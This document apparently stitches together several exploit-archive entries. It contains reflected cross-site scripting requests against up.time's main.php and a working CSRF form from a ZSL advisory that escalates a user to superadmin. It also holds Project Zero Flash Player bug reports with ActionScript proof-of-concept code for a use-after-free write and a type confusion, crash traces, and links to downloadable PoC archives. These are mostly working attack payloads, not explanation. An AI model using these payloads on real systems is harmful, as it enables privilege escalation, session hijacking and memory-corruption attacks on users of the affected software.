GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3a00%3a006795f"><img%20src%3da%20onload%3dalert(1)>c92fbc98475&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28c0570"><img%20src%3da%20onload%3dalert(1)>77b8cd697e9&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3a59%3a592b983"><img%20src%3da%20onload%3dalert(1)>0d9cc3967ae&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane26cca6"><img%20src%3da%20onload%3dalert(1)>84e475837bc&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6b50fa%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed94954ba0d3&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
<!--
up.time 7.5.0 Superadmin Privilege Escalation Exploit
Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
Summary: The next-generation of IT monitoring software.
Desc: up.time suffers from a privilege escalation issue.
Normal user can elevate his/her privileges by sending
a POST request seting the parameter 'userroleid' to 1.
Attacker can exploit this issue using also cross-site
request forgery attacks.
Tested on: Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5251
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5251.php
29.07.2015
--
-->
<html>
<body>
<form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=4" method="POST">
<input type="hidden" name="operation" value="submit" />
<input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
<input type="hidden" name="username" value="Testingus2" />
<input type="hidden" name="password" value="*****" />
<input type="hidden" name="passwordConfirm" value="*****" />
<input type="hidden" name="firstname" value="Test" />
<input type="hidden" name="lastname" value="Ingus" />
<input type="hidden" name="location" value="Neverland" />
<input type="hidden" name="emailaddress" value="test2@test.test" />
<input type="hidden" name="emailtimeperiodid" value="1" />
<input type="hidden" name="phonenumber" value="111111" />
<input type="hidden" name="phonenumbertimeperiodid" value="1" />
<input type="hidden" name="windowshost" value="test" />
<input type="hidden" name="windowsworkgroup" value="testgroup" />
<input type="hidden" name="windowspopuptimeperiodid" value="1" />
<input type="hidden" name="landingpage" value="MyPortal" />
<input type="hidden" name="isonvacation" value="0" />
<input type="hidden" name="receivealerts" value="on" />
<input type="hidden" name="receivealerts" value="1" />
<input type="hidden" name="alertoncritical" value="on" />
<input type="hidden" name="alertoncritical" value="1" />
<input type="hidden" name="alertonwarning" value="on" />
<input type="hidden" name="alertonwarning" value="1" />
<input type="hidden" name="alertonunknown" value="on" />
<input type="hidden" name="alertonunknown" value="1" />
<input type="hidden" name="alertonrecovery" value="on" />
<input type="hidden" name="alertonrecovery" value="1" />
<input type="hidden" name="activexgraphs" value="0" />
<input type="hidden" name="newuser" value="on" />
<input type="hidden" name="newuser" value="1" />
<input type="hidden" name="userroleid" value="1" />
<input type="hidden" name="usergroupid[]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Source: https://code.google.com/p/google-security-research/issues/detail?id=484&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=508072]
VULNERABILITY DETAILS
Copy Paste of Issue 480496
VERSION
Chrome Version: N/A yet, Flash 18.0.0.203
Operating System: [Win7 x64 SP1]
REPRODUCTION CASE
Flash 18.0.0.203 patched Issue 480496 by checking if the internal filter object is still alive after the first Array.length call (from Flash player standalone):
.text:004D71DA loc_4D71DA:
.text:004D71DA and ecx, 0FFFFFFF8h
.text:004D71DD call xAS2_getArrayLength
.text:004D71E2 test eax, eax
.text:004D71E4 jle short loc_4D725D
.text:004D71E6 mov ecx, [esp+8+arg_C]
.text:004D71EA mov eax, [ecx+94h]
.text:004D71F0 test eax, 0FFFFFFFEh
.text:004D71F5 jz short loc_4D7200
.text:004D71F7 and eax, 0FFFFFFFEh
.text:004D71FA cmp dword ptr [eax+28h], 0 ; here we check whether the object has been deleted or not
.text:004D71FE jnz short loc_4D720B
.text:004D7200
.text:004D7200 loc_4D7200:
.text:004D7200 mov ecx, dword_E51A40
.text:004D7206 call sub_968A00 ; and in that case we suicide
Unfortunately they forget to do that check after the second Array.length call:
.text:004D721D loc_4D721D:
.text:004D721D and eax, 0FFFFFFF8h
.text:004D7220 push edi
.text:004D7221 mov edi, eax
.text:004D7223 mov ecx, edi
.text:004D7225 xor esi, esi
.text:004D7227 call xAS2_getArrayLength ; here we can still execute a script and delete the filters...
.text:004D722C test eax, eax
.text:004D722E jle short loc_4D725C
Should crash that way:
CPU Disasm
Address Hex dump Command Comments
004CE27F 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4]
004CE282 8942 04 MOV DWORD PTR DS:[EDX+4],EAX ; write a pointer to 0x41424344
004CE285 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4]
004CE288 8950 08 MOV DWORD PTR DS:[EAX+8],EDX
004CE28B FF41 08 INC DWORD PTR DS:[ECX+8]
004CE28E 8941 04 MOV DWORD PTR DS:[ECX+4],EAX
004CE291 C2 0400 RETN 4
004CE294 FF41 08 INC DWORD PTR DS:[ECX+8]
***************************************************************************
Content of flash_as2_filters_uaf_write4_poc.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "4"
//It's because Flash CS5.5 does not allow naming a property with a numeral
import flash.filters.GlowFilter;
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x3F8/4;i++) {
a2[i] = 0x41424344
}
a2[3] = 0
a2[0x324/4] = 0x41424344
a2[0x324/4 + 1] = 0x41424344
a2[0x324/4 + 2] = 0x41414143
a2[0x324/4 + 3] = 0x41414100
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x100;i++) {
a1[i].tabStops = a2
}
a1[0xFF].tabStops = []
function f() {
_global.mc.createTextField("tf",1,1,2,3,4)
a1[0xFE].tabStops = []
a1[0xFD].tabStops = []
for (var i = 0x100; i<0x200;i++) {
_global.a1[i].tabStops = _global.a2
}
}
_global.mc = this
_global.counter = 0
_global.a1 = a1
_global.a2 = a2
var oCounter:Object = new Object()
oCounter.valueOf = function () {
_global.counter += 1
if (_global.counter == 4) f()
return 10;
}
var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o;
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37884.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=426&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
To reproduce, host the attached files appropriately, and:
http://localhost/LoadMP4.swf?file=crash3006694.flv
If there is no crash at first, refresh the page a few times.
With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:
=> 0x00007f7779846eee: mov %ax,(%rdi,%rdx,2)
rax 0xff69
rdi 0x7f7778b70000
rdx 0x160b
7f777861e000-7f7778b72000 rw-p 00000000 00:00 0
7f7778b72000-7f7779228000 ---p 00000000 00:00 0
It looks like an indexing error; the rdi "base" address is in bounds but add on 2*rdx and the address is not in bounds.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37880.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=434&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The Shared Object constructor does not check that the object it is provided is of type Object before setting it to be of type SharedObject. This can cause problems if another method (such as Sound.loadSound) calls into script between checking the input object type, and casting its native object. A PoC is as follows:
class subso extends Sound{
public function subso(f){
super("_level0.test");
var n = {valueOf : func};
_global.func = f;
_global.t = this;
var f2 = this.loadSound;
f2.call(this, n, 1);
}
function func(){
_global.func(_global.t,"/sosuper.swf", "/sosuper.swf");
return 1;
}
}
A sample fla, swf and AS file are attached. Note that this PoC needs to be hosted on a webserver to work and only works on 32-bit systems (tested on Windows Chrome). song1.mp3 should be put in the same folder on the server as the swf, it is needed for loadSound to work. This bug is likely only exploitable on 32-bit systems due to how the type-confused fields line up.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37881.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=400&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The attached sample file, signal_sigsegv_7ffff637297a_8900_e3f87b25c25db8f9ec3c975f8c1211cc.swf, crashes, perhaps relating to XML handling.
The crash looks like this on Linux x64:
=> 0x00007f6931226f22: mov 0x8(%rcx),%eax
rcx 0x303030303030300 217020518514230016
The wider context shows that the wild pointer target can be incremented with this vulnerability, which is typically enough for an exploit:
=> 0x00007f6931226f22: mov 0x8(%rcx),%eax <--- read
0x00007f6931226f25: test %eax,%eax
0x00007f6931226f27: je 0x7f6931226f80
0x00007f6931226f29: test $0x40000000,%eax
0x00007f6931226f2e: jne 0x7f6931226f80
0x00007f6931226f30: add $0x1,%eax <--- increment
0x00007f6931226f33: cmp $0xff,%al
0x00007f6931226f35: mov %eax,0x8(%rcx) <--- write back
The base sample from which this fuzz case was generated is also attached, e3f87b25c25db8f9ec3c975f8c1211cc.swf
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37870.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=443&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
If an mp3 file contains compressed ID3 data that is larger than 0x2aaaaaaa bytes, an integer overflow will occur in allocating the buffer to contain its converted string data, leading to a large copy into a small buffer. A sample fla, swf and mp3 are attached. Put id34.swf and tag.mp3 in the same folder to reproduce the issue. This issue only works on 64 bit platforms.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37882.zip